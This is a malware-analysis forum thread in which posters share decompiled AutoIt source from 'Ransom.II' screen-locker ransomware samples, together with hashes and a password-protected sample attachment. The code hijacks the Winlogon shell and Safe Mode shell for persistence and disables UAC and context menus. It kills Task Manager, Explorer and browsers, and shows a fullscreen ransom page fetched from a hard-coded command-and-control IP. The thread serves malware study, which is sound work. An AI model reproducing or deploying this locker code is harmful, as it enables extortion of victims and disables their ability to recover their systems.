Attachments
pass: infected
(366.03 KiB) Downloaded 172 times
(366.03 KiB) Downloaded 172 times
A forum for reverse engineering, OS internals and malware analysis
Win32:Virut wrote:Ransom.IIParts of decompiled Autoit script. / Highlights?
MD5: F74E910C368717E9ACEF3A1B9A1A9F03
Screenshots: https://www.botnets.fr/index.php/Ransom.II
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp
$UNDERGROUND = "brasilia"
$SWISS = "germany"
ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
If @OSArch = "X64" Then
RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
Else
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
EndIf
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
$DIFF = TimerDiff($TIMER)
If $DIFF > 150 Then
If ProcessExists("taskmgr.exe") Then
ProcessClose("taskmgr.exe")
EndIf
If ProcessExists("explorer.exe") Then
Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
EndIf
$DIFF = 0
$TIMER = TimerInit()
EndIf
WinSetOnTop($HGUI, "", 1)
WinActivate($HGUI)
WEnd
Win32:Virut wrote:Ransom.IILots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.
MD5: 82B192B07B32D0E77B1F2B21F17283E6
https://www.virustotal.com/file/edd206f ... /analysis/
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp
If FileExists(@AppDataDir & "1.exe") Then
$HAFTBEFEHLAAT = "haftbefehlaat"
$URL = "95.163.104.87/aff14/start.php"